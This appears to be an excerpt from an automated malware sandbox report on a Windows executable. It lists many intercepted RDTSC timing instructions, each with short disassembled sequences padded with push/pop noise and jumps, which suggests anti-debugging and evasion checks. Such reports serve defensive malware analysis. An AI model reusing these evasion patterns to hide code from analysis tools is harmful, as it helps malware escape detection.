Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E01DA second address: 9E01EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F270C8198CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A2E59F second address: A2E5C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F270C81A217h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A2EF88 second address: A2EF92 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A2EF92 second address: A2EF96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A2EF96 second address: A2EF9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A31AB4 second address: A31ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F270C81A206h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A358B0 second address: A358B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A358B6 second address: A358DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F270C81A219h 0x0000000f js 00007F270C81A206h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A35BB9 second address: A35BBE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A35BBE second address: A35BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A35D1E second address: A35D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A35FFA second address: A36004 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F270C81A206h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A36004 second address: A36020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F270C8198C6h 0x0000000d jno 00007F270C8198C6h 0x00000013 pushad 0x00000014 popad 0x00000015 ja 00007F270C8198C6h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A36182 second address: A3618C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A3618C second address: A36190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A36190 second address: A36194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A36194 second address: A3619A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A3DF58 second address: A3DF76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F270C81A214h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A3BF03 second address: A3BF5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F270C8198CFh 0x0000000a jng 00007F270C8198C6h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F270C8198D0h 0x00000017 ja 00007F270C8198C6h 0x0000001d jnp 00007F270C8198C6h 0x00000023 jmp 00007F270C8198CCh 0x00000028 popad 0x00000029 pop edx 0x0000002a pop eax 0x0000002b push ebx 0x0000002c pushad 0x0000002d jmp 00007F270C8198CEh 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A3C083 second address: A3C087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A3C087 second address: A3C08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A3C81E second address: A3C83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F270C81A216h 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A3C83D second address: A3C842 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A3C842 second address: A3C860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F270C81A214h 0x00000009 pop esi 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A3C860 second address: A3C87B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F270C8198CAh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jg 00007F270C8198C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A3CE28 second address: A3CE2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A3D06E second address: A3D072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A3D6F7 second address: A3D6FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A3D9C2 second address: A3D9DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198D8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A3D9DE second address: A3D9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A3D9E4 second address: A3DA07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F270C8198CEh 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A3DA07 second address: A3DA0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A467CF second address: A467F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F270C8198D2h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F270C8198C6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A467F0 second address: A467F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A467F6 second address: A46813 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F270C8198C6h 0x00000009 jo 00007F270C8198C6h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 jnl 00007F270C8198C6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A46C1F second address: A46C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A46C25 second address: A46C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F270C8198D5h 0x00000009 popad 0x0000000a jmp 00007F270C8198D8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A46C5B second address: A46C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A4EAE6 second address: A4EAEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A4EC52 second address: A4EC56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A4EC56 second address: A4EC60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A4EC60 second address: A4EC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A4EC64 second address: A4EC68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A4EC68 second address: A4EC6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A4EC6E second address: A4EC74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A4EC74 second address: A4EC79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A4EC79 second address: A4EC81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A4F480 second address: A4F48B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A4F48B second address: A4F49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F270C8198CBh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A4F734 second address: A4F73A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A4F8CD second address: A4F8DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007F270C8198C8h 0x0000000b popad 0x0000000c push ebx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A4FF5F second address: A4FF69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F270C81A206h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A4FF69 second address: A4FF8C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F270C8198D5h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A57E90 second address: A57EBC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F270C81A206h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F270C81A212h 0x00000012 jbe 00007F270C81A206h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A57EBC second address: A57EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A57A01 second address: A57A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F270C81A206h 0x0000000a popad 0x0000000b jmp 00007F270C81A219h 0x00000010 push eax 0x00000011 jmp 00007F270C81A20Ch 0x00000016 pop eax 0x00000017 popad 0x00000018 jnl 00007F270C81A224h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A57A3D second address: A57A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A57A45 second address: A57A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 je 00007F270C81A206h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9BBE82 second address: 9BBECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F270C8198E1h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F270C8198D8h 0x00000011 je 00007F270C8198C8h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A57BC2 second address: A57BC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A57BC6 second address: A57BCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A5A206 second address: A5A20C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A5B8AC second address: A5B8B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A66933 second address: A6693F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A66A6D second address: A66A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A68FE8 second address: A68FF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007F270C81A206h 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A7CA01 second address: A7CA08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A839B8 second address: A839BE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A839BE second address: A839CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jno 00007F270C8198C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A839CE second address: A839E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A20Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A839E5 second address: A839E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A826C3 second address: A826CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F270C81A206h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A826CD second address: A826D2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A82992 second address: A82997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A82997 second address: A8299C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A8299C second address: A829B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F270C81A206h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A829B1 second address: A829B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A829B5 second address: A829BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A82C69 second address: A82C90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198D7h 0x00000007 ja 00007F270C8198C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A82C90 second address: A82C94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A836ED second address: A836F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A88728 second address: A8872C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A8F25E second address: A8F28A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F270C8198CCh 0x0000000d jmp 00007F270C8198D8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: A8F28A second address: A8F28E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AA1B51 second address: AA1B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AA1B57 second address: AA1B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F270C81A206h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AA35E1 second address: AA3604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F270C8198D5h 0x0000000b js 00007F270C8198C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AA3485 second address: AA34C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007F270C81A219h 0x0000000d jmp 00007F270C81A211h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F270C81A20Dh 0x00000019 popad 0x0000001a jo 00007F270C81A21Ah 0x00000020 push eax 0x00000021 push edx 0x00000022 jno 00007F270C81A206h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AA34C1 second address: AA34C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AAB1F7 second address: AAB20E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F270C81A20Fh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AAA3E1 second address: AAA3FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F270C8198D2h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AAA530 second address: AAA535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AAA986 second address: AAA9A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F270C8198D4h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AAA9A4 second address: AAA9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AAA9AA second address: AAA9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F270C8198CFh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F270C8198C6h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: AAA9CA second address: AAA9D9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F270C81A206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
